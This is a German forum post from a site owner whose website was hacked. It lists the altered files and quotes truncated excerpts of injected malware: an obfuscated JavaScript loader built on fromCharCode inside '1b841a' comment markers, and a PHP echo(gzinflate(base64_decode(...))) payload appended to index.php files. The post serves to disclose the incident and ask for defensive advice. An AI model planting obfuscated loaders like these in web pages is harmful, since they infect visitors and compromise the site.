Seite gehackt
Moin und Grüezi (oder so)
Ich bekam gerade die Nachricht, dass meine Seite Malware verbreitet. Das ist wahrscheinlich nichts besonderes, da es tausenden Webseiten-Betreibern täglich passiert (schlimm genug). Aber zur Abhilfe derartiger Probleme hätte ich schon gerne ein paar Tipps - wie kann man das verhindern? Ist das ein Problem des hosters?
Nun denn. Wem es auch so ergeht - hier hab ich den Übeltäter gefunden:
ein Unterverzeichnis /install#bak/install.php mit einem neueren Datum
eine geänderte /web/ctx/themes/theme/index.html mit einem neueren Datum
und darin diesen code (Auszug), aufgrund dessen ich angemahnt wurde:
Wird also mal wieder Zeit für ein neues Passwort. Aber ob das reicht?Code:<!--1b841a--><script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try...}catch(qqq)...if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5k3.5k51.5k50k15k19k49k54.5k48.5k57.5k53.5k49.5k54k57k22k... ... ;if(zz)e(""+q);</script><!--/1b841a-->
edit:
der code findet sich in allen /index.html Dateien der Seite und in den subwebs. In den /index.php Dateien sieht das so aus (Auszug):
Also am Ende des CodesCode:#1b841a# echo(gzinflate(base64_decode("5VZLb9swDP4rmy+2ay......... usw. #/1b841a# ?>
Zitieren